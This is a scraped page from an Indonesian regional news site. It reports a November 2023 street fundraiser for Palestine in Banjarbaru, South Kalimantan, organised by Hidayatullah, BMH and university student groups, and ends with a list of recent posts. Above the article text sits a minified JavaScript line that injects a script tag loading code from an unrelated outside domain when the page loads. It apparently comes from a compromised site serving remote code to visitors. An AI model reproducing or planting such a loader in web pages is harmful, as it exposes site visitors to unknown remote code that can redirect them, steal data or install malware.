(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kalimantan Selatan

Kolaborasi Aksi Galang Dana untuk Palestina di A Yani Km 33 Banjarbaru


KANALKALIMANTAN.COM, BANJARBARU – Kolaborasi aksi galang dana untuk Palestina berlangsung di traffic light Jalan A Yani Km 33 Banjarbaru, Kalimantan Selatan, Sabtu (4/11/2023) siang.

Aksi galang dana untuk Palestina diikuti berbagai organisasi dan komunitas diantaranya Laznas BMH, DPD Hidayatullah Banjarbaru, Pemuda Hidayatullah Kalsel, Komunitas UIN Peduli Kalsel, mahasiswa UIN Antasari, Komunitas Payung Dakwah UIN Antasari, Komunitas Ushuluddin Humaniora UIN Antasari, Forum Muda FTK, dan PMK Rapelia.

Syafardi, Ketua Pemuda Hidayatullah Kalimantan Selatan koordinator penggalangan dana mengatakan, kegiatan penggalangan dana dilaksanakan dua kali. “Sebelumnya turun ke jalan pada hari Rabu (25/10/2023), kita laksanakan penggalangan dana, dengan jumlah dana yang kita dapatkan yaitu sebesar 15 juta lebih,” ucapnya.

Baca juga: Resmi 694 Caleg DPRD Kalsel Bertarung di Pemilu 2024

“Alhamdulillah kegiatan hari ini yang kami laksanakan berjalan dengan lancar, dana yang kami himpun insya Allah akan kami titip melalui BMH Perwakilan Kalimantan Selatan dan diteruskan ke BMH pusat dan akan disalurkan kepada rakyat Palestina,” bebernya.

BMH adalah sebuah Lembaga Amil Zakat yang terdaftar secara resmi di Kementerian Agama (Kemenag) RI. “Alhamdulillah BMH ini juga sudah hadir di setiap provinsi yang ada di Indonesia, termasuk BMH hadir di Provinsi Kalimantan Selatan.

“Teman-teman bisa mengakses kegiatan-kegiatan BMH dan laporan penghimpunan dana itu bisa dicek di media sosial BMH terutama di Instagram Bmhkalselofficial,” katanya.

Baca juga: Pemulasaran Jenazah Islam “Saran Kanda” Digelar di Desa Tanjung Rema

“Semoga dengan aksi yang kita laksanakan pada hari ini dan kemarin bisa membantu meringankan beban-beban rakyat Palestina. Inilah aksi nyata yang bisa kita lakukan sebagai rasa solidaritas atas kekejaman kemanusiaan atas rakyat Palestina yang dilakukan oleh tentara Zionis Israel,” jelasnya.

Melalui aksi ini, mereka mengajak seluruh warga Kalimantan Selatan untuk berpartisipasi menyumbangkan harta maupun melalui doa.

Baca juga: Presiden Jokowi Groundbreaking PLTS 50 MW di IKN Nusantara, Hadirkan 100% Energi Bersih

“Kegiatan penggalangan dana yang kami lakukan hari ini adalah atas dasar kepedulian kami terhadap rakyat Palestina yang sekarang sedang ditindas,” ucap Nanda Ramadhan, salah satu peserta aksi.
(Kanalkalimantan.com/nh)

Reporter : nh
Editor : bie


Muhammad Andi

Recent Posts

Jalinan Erat Silaturahmi Warga Sungai Besar dari Budaya Banjar “Balogo”

KANALKALIMANTAN.COM, BANJARBARU – Suasana riuh diiringi tawa gembira warga baik tua, muda, hingga anak-anak, larut… Read More

14 jam ago

Pelantikan Pengurus Wilayah Keluarga Besar PII Kalsel

KANALKALIMANTAN.COM, BANJARMASIN – 4 Mei diperingati Hari Bangkit (Harba) organisasi pelajar tertua di Tanah Air,… Read More

15 jam ago

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

16 jam ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

17 jam ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

21 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

23 jam ago

This website uses cookies.